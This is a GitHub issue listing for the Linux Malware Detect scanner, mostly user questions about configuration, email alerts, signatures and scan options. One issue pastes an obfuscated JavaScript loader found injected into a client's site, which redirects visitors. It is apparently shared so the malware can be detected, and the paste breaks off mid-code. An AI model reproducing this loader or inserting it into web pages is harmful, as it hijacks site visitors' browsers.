linux-malware-detect
linux-malware-detect copied to clipboard
rfxn
Linux Malware Detection (LMD)
Dear Team, This is the setting in my conf.maldet , however I dont receive any email when i run maldet -a /home/kvm. I have to email manually by using below...
After upgrading maldet from 1.6.3 to 1.6.4 with `maldet --update-ver` all the new slack options are missing from `/usr/local/maldetect/conf.maldet`. I thought that the updater would add new options automatically. Is...
Hi LMD, Thank you very much for providing this for everyone. How can I have LMD maldet list folders and files while it is scanning verifying they have been scanned...
Because of false positives with webalizer log files reported on https://github.com/rfxn/linux-malware-detect/issues/318 an account was reported suspended as follows: ``` HOST: ns1.custom.com SCAN ID: 181223-0838.23527 STARTED: Sat Dec 22 10:58:42 2018...
Hi! I have tried to add some custom MD5 signatures in the file "/usr/local/maldetect/sigs/custom.md5.dat" I have used both MD5 versions, but the file with the matched MDA/MD5 is not detected....
Just a quick note that I noticed that adguard and adguard DNS is blocking access to rfxn.com. 
Modified view_report() with following changes: * added option 'newest' as alias to --report and --report "" to allow $ maldet --report newest [email protected] * properly email most recent report when...
If you have a non-existant user specified in the scan_ignore_user setting then no files will be scanned when trying to run a scan. example in `/usr/local/maldetect/conf.maldet` ``` scan_ignore_user="test" ``` When...
I know that there was a pull request for this that was reverted for 1.6.4 but I think we should still look at fixing this. I just ran into this...
my client site got PHP inject the impact is the site will redirect to the other site, and here is the code var _0x6eea=["\x56\x79\x7A\x43\x6B\x63\x4B\x65\x77\x37\x67\x39\x64\x43\x6C\x36\x77\x70\x6E\x43\x6F\x63\x4F\x57\x51\x38\x4B\x57\x63\x57\x44\x44\x74\x47\x67\x63\x77\x70\x6B\x3D","\x4D\x73\x4B\x76\x77\x34\x72\x44\x6A\x4D\x4B\x6B\x59\x77\x37\x43\x69\x57\x6A\x43\x71\x38\x4F\x57\x56\x77\x3D\x3D","\x63\x38\x4B\x43\x77\x6F\x66\x43\x71\x63\x4F\x6B\x77\x71\x41\x7A\x77\x70\x76\x44\x73\x63\x4F\x64","\x45\x73\x4B\x4B\x42\x33\x63\x35\x53\x77\x3D\x3D","\x62\x57\x37\x43\x6E\x52\x2F\x44\x67\x73\x4B\x78\x45\x63\x4F\x72\x4A\x6D\x6A\x44\x76\x77\x37\x44\x75\x77\x3D\x3D","\x77\x70\x72\x43\x73\x63\x4F\x4D\x77\x71\x7A\x43\x69\x52\x70\x42\x42\x47\x6F\x3D","\x46\x44\x6A\x44\x73\x38\x4F\x6C\x77\x6F\x70\x65\x77\x72\x31\x5A\x46\x51\x3D\x3D","\x47\x43\x2F\x43\x6B\x4D\x4B\x31\x77\x37\x63\x73\x63\x43\x4E\x36\x77\x34\x58\x44\x75\x38\x4B\x30\x51\x63\x4F\x69\x5A\x6D\x62\x44\x69\x43\x6B\x46\x77\x6F\x6E\x44\x6A\x79\x78\x4B\x77\x36\x73\x6C\x77\x35\x64\x61\x77\x6F\x5A\x56\x77\x70\x45\x78\x77\x35\x37\x44\x68\x63\x4B\x79\x5A\x4D\x4F\x79\x77\x35\x48\x44\x6D\x4D\x4F\x6E\x54\x57\x49\x72\x52\x38\x4F\x2F\x4A\x63\x4F\x65\x45\x57\x58\x43\x75\x6D\x5A\x4C\x77\x71\x54\x44\x6F\x73\x4B\x59\x77\x70\x76\x44\x70\x4D\x4B\x58\x77\x72\x58\x44\x6C\x55\x38\x30\x77\x70\x2F\x44\x76\x43\x31\x46\x59\x44\x72\x43\x6E\x47\x55\x57\x4B\x38\x4B\x71\x77\x35\x67\x55\x64\x69\x70\x35\x77\x71\x50\x44\x6B\x4D\x4B\x2F\x77\x37\x34\x54\x77\x36\x4C\x44\x72\x78\x49\x55\x77\x34\x62\x44\x69\x46\x4C\x43\x6F\x63\x4F\x4D\x4D\x31\x4C\x44\x71\x52\x78\x4C\x49\x4D\x4F\x58\x77\x6F\x67\x6F\x77\x37\x56\x62\x5A\x63\x4B\x4F\x57\x38\x4B\x74\x4C\x63\x4F\x45\x77\x6F\x63\x54\x77\x36\x6B\x74\x77\x70\x78\x5A\x77\x70\x4A\x34\x58\x6C\x54\x43\x68\x54\x77\x42\x61\x73\x4B\x58\x77\x36\x54\x44\x67\x73\x4B\x75\x77\x34\x76\x43\x69\x47\x4D\x57\x63\x30\x30\x44\x59\x53\x70\x72\x77\x36\x4E\x35\x77\x72\x46\x47\x77\x6F\x68\x4E\x77\x6F\x6A\x43\x6F\x30\x46\x50\x77\x70\x4C\x43\x76\x63\x4F\x67\x45\x33\x73\x36\x77\x37\x4C\x44\x6A\x63\x4B\x33\x77\x71\x37\x43\x6F\x63\x4B\x65\x62\x6A\x6F\x2B\x64\x63\x4F\x4C\x77\x36\x74\x59\x49\x38\x4F\x32\x4A\x77\x6E\x44\x71\x43\x41\x54\x5A\x73\x4F\x78\x56\x4D\x4B\x57\x77\x35\x7A\x44\x72\x46\x4A\x48\x77\x35\x38\x69\x51\x47\x62\x44\x6E\x30\x51\x4B\x77\x34\x33\x44\x6D\x73\x4B\x77\x77\x37\x64\x6D\x61\x32\x44\x43\x6C\x38\x4F\x47\x77\x36\x42\x37\x58\x48\x76\x43\x6F\x73\x4B\x7A\x45\x79\x37\x44\x6C\x55\x49\x56\x77\x36\x42\x55\x51\x4D\x4F\x4F\x63\x73\x4B\x68\x77\x37\x6E\x44\x69\x45\x72\x44\x75\x6A\x6F\x55\x63\x6A\x7A\x44\x72\x7A\x51\x74\x77\x37\x72\x43\x75\x77\x6E\x44\x6F\x73\x4F\x5A\x59\x45\x4D\x78\x77\x6F\x77\x6F\x77\x72\x74\x2B\x77\x37\x37\x43\x73\x4D\x4B\x6C\x54\x55\x33\x44\x69\x7A\x6B\x44\x77\x35\x55\x77\x62\x73\x4B\x70\x4C\x73\x4F\x4B\x77\x35\x48\x43\x67\x38\x4F\x45\x56\x4D\x4F\x62\x55\x38\x4B\x70\x77\x36\x6E\x43\x72\x4D\x4B\x2B\x61\x6C\x4C\x44\x6F\x63\x4F\x57\x4C\x4D\x4B\x44\x77\x6F\x7A\x44\x6D\x63\x4B\x50\x77\x35\x33\x44\x69\x67\x6A\x43\x6A\x73\x4F\x42\x4F\x33\x48\x44\x74\x6B\x7A\x44\x75\x73\x4F\x71\x77\x70\x76\x44\x68\x6C\x59\x57\x53\x41\x50\x43\x6F\x38\x4F\x77\x77\x6F\x30\x68\x61\x78\x73\x74\x66\x6B\x7A\x43\x6C\x63\x4F\x6C\x77\x70\x46\x56\x5A\x54\x49\x63\x77\x34\x4D\x74\x51\x7A\x6B\x65\x77\x35\x2F\x44\x6A\x4D\x4B\x30\x41\x63\x4F\x77\x56\x63\x4F\x39\x77\x36\x63\x52\x57\x73\x4F\x68\x77\x37\x74\x61\x77\x6F\x37\x43\x73\x30\x50\x44\x74\x63\x4F\x52\x77\x72\x58\x44\x6B\x38\x4F\x61\x77\x72\x6A\x44\x6C\x41\x46\x69\x77\x36\x37\x44\x67\x73\x4B\x74\x4D\x63\x4B\x71\x49\x43\x4C\x43\x6F\x41\x62\x44\x6E\x4D\x4F\x76\x77\x72\x30\x37\x41\x73\x4F\x74\x53\x68\x63\x45\x77\x72\x52\x51\x43\x73\x4B\x47\x64\x38\x4B\x61\x45\x47\x67\x70\x45\x54\x78\x2F\x77\x6F\x6A\x44\x6B\x38\x4F\x50\x63\x78\x4D\x73\x77\x70\x30\x50\x77\x72\x54\x43\x70\x56\x44\x43\x6E\x73\x4B\x42\x77\x72\x6E\x44\x6D\x55\x6E\x44\x74\x63\x4F\x69\x77\x71\x45\x4F\x77\x6F\x50\x43\x70\x38\x4F\x59\x58\x38\x4B\x62\x47\x73\x4F\x44\x53\x51\x6F\x4A\x77\x36\x63\x63\x77\x72\x58\x43\x71\x4D\x4B\x73\x77\x70\x6A\x44\x6C\x4D\x4B\x4E\x59\x45\x58\x44\x69\x31\x48\x44\x74\x38\x4F\x6F\x77\x72\x70\x72\x77\x35\x37\x44\x74\x32\x77\x6F\x44\x63\x4B\x61\x77\x37\x62\x43\x73\x63\x4F\x71\x53\x4D\x4B\x55\x77\x71\x50\x43\x74\x73\x4F\x6C\x52\x4D\x4F\x43\x4F\x30\x35\x65\x77\x34\x76\x44\x6F\x4D\x4B\x46\x77\x35\x64\x44\x77\x70\x41\x73\x77\x6F\x74\x2B\x77\x34\x6F\x72\x47\x58\x6C\x73\x77\x70\x30\x71\x58\x63\x4F\x73\x4B\x4D\x4F\x6A\x77\x71\x58\x43\x6F\x4D\x4B\x72\x77\x36\x73\x30\x62\x63\x4F\x2B\x77\x36\x56\x6C\x55\x6E\x76\x43\x68\x73\x4F\x4D\x77\x36\x35\x50\x77\x36\x54\x44\x76\x78\x76\x43\x68\x43\x33\x44\x71\x4D\x4B\x7A\x77\x6F\x70\x56\x77\x36\x4C\x43\x74\x33\x74\x59\x64\x6A\x62\x44\x6E\x6D\x30\x65\x45\x53\x48\x44\x74\x73\x4B\x64\x77\x37\x59\x52\x77\x6F\x58\x43\x67\x56\x64\x53\x77\x34\x4C\x44\x74\x63\x4B\x35\x66\x73\x4B\x63\x77\x72\x6F\x55\x77\x70\x7A\x43\x76\x38\x4F\x32\x56\x31\x44\x44\x6D\x6B\x58\x44\x68\x52\x51\x4C\x47\x73\x4F\x6B\x77\x6F\x6C\x32\x4A\x63\x4B\x56\x77\x34\x56\x74\x77\x35\x66\x43\x67\x51\x6C\x6C\x44\x73\x4F\x67\x77\x72\x6A\x44\x74\x4D\x4F\x2B\x4B\x6D\x73\x36\x77\x35\x39\x6A\x77\x37\x37\x43\x68\x31\x44\x43\x73\x44\x52\x69\x77\x34\x33\x43\x6F\x33\x6E\x43\x73\x63\x4F\x59\x77\x36\x6C\x72\x77\x72\x70\x33\x58\x73\x4B\x36\x77\x72\x6F\x70\x77\x71\x6A\x43\x6D\x63\x4F\x30\x77\x70\x55\x4F\x63\x6C\x48\x44\x6B\x69\x76\x43\x75\x48\x4C\x44\x6B\x63\x4B\x72\x77\x35\x66\x44\x70\x45\x76\x44\x70\x32\x76\x43\x75\x38\x4B\x32\x4E\x67\x54\x44\x69\x38\x4F\x6A\x77\x37\x44\x44\x73\x63\x4F\x4F\x46\x73\x4B\x49\x77\x70\x62\x44\x6E\x58\x59\x37\x77\x6F\x38\x39\x52\x77\x44\x43\x69\x63\x4B\x58\x62\x47\x56\x6E\x49\x42\x62\x44\x6D\x4D\x4F\x45\x77\x35\x62\x43\x6B\x38\x4F\x4D\x52\x4D\x4F\x77\x64\x4D\x4B\x50\x77\x35\x54\x44\x6D\x32\x45\x31\x77\x72\x37\x44\x6A\x57\x37\x44\x74\x73\x4F\x32\x41\x63\x4F\x56\x77\x36\x67\x65\x55\x54\x77\x2F\x77\x34\x4D\x73\x77\x71\x6B\x2B\x77\x37\x48\x44\x75\x4D\x4B\x6E\x77\x72\x38\x31\x4E\x4D\x4B\x58\x77\x36\x33\x44\x74\x6A\x66\x43\x67\x73\x4B\x6B\x77\x37\x64\x39\x77\x6F\x50\x43\x6E\x56\x70\x42\x77\x36\x31\x6F\x42\x4D\x4B\x39\x65\x78\x63\x4D\x55\x73\x4F\x73\x4A\x73\x4B\x2B\x61\x38\x4B\x53\x55\x31\x42\x4A\x53\x4D\x4F\x74\x66\x48\x70\x51\x77\x70\x6A\x44\x6F\x73\x4F\x63\x77\x35\x6E\x44\x6F\x63\x4F\x52\x77\x35\x45\x6B\x77\x71\x4C\x44\x6F\x4D\x4F\x42\x77\x6F\x35\x35\x77\x34\x6A\x44\x69\x33\x34\x75\x63\x38\x4F\x43\x44\x48\x6A\x43\x68\x33\x6E\x44\x6A\x43\x48\x44\x67\x73\x4B\x52\x4B\x73\x4F\x6F\x77\x35\x76\x43\x68\x77\x78\x64\x77\x36\x4C\x43\x6A\x38\x4F\x5A\x57\x67\x49\x61\x77\x71\x44\x43\x68\x4D\x4F\x51\x66\x63\x4F\x6C\x77\x36\x50\x43\x75\x73\x4F\x74\x4B\x38\x4F\x2B\x77\x35\x6A\x44\x76\x38\x4B\x46\x65\x32\x59\x57\x57\x73\x4F\x36\x47\x33\x72\x44\x75\x41\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x55\x44\x50\x4D\x49\x55","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x58\x70\x44\x42\x61\x53","\x53\x4A\x4E\x65\x62\x4B","\x6C\x75\x42\x49\x48\x6B","\x30\x78\x30","\x43\x31\x25\x4A","\x30\x78\x31","\x49\x39\x5A\x77","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x30\x78\x32","\x36\x65\x21\x42","\x30\x78\x33","\x5A\x41\x54\x25","\x30\x78\x34","\x76\x57\x51\x5D","\x30\x78\x35","\x30\x78\x36","\x4B\x4D\x61\x25","\x30\x78\x37","\x6C\x6A\x70\x56"];var _0x69b4=[_0x6eea[0],_0x6eea[1],_0x6eea[2],_0x6eea[3],_0x6eea[4],_0x6eea[5],_0x6eea[6],_0x6eea[7],_0x6eea[8],_0x6eea[9],_0x6eea[10],_0x6eea[11],_0x6eea[12],_0x6eea[13],_0x6eea[14],_0x6eea[15],_0x6eea[16],_0x6eea[17],_0x6eea[18],_0x6eea[19],_0x6eea[20],_0x6eea[21],_0x6eea[22],_0x6eea[23],_0x6eea[24],_0x6eea[25],_0x6eea[26],_0x6eea[27],_0x6eea[28],_0x6eea[29],_0x6eea[30],_0x6eea[31],_0x6eea[32],_0x6eea[33],_0x6eea[34],_0x6eea[35],_0x6eea[36],_0x6eea[37],_0x6eea[38],_0x6eea[39],_0x6eea[40],_0x6eea[41],_0x6eea[42],_0x6eea[43],_0x6eea[44],_0x6eea[45],_0x6eea[46],_0x6eea[47],_0x6eea[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0x130bx3,_0x130bx4){var _0x130bx5=function(_0x130bx6){while(--_0x130bx6){_0x130bx3[_0x69b4[9]](_0x130bx3[_0x69b4[8]]())}};_0x130bx5(++_0x130bx4)}(_0x53ac,0x6b));var _0x4824=function(_0x130bx8,_0x130bx9){_0x130bx8= _0x130bx8- 0x0;var...
